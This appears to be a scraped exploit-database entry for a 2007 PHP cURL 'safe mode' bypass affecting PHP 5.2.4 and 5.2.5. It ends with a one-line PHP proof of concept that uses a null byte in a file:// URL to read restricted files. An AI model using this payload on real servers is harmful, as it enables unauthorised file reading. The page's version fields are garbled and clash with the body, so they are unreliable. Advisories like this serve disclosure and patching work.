header-logo
Suggest Exploit
vendor:
cURL
by:
SecurityFocus
7.5
CVSS
HIGH
Security-Bypass
16
CWE
Product Name: cURL
Affected Version From: 5.2.2005
Affected Version To: 5.2.2004
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

PHP cURL ‘safe mode’ Security-Bypass Vulnerability

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

Mitigation:

Upgrade to the latest version of PHP cURL.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4. 

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));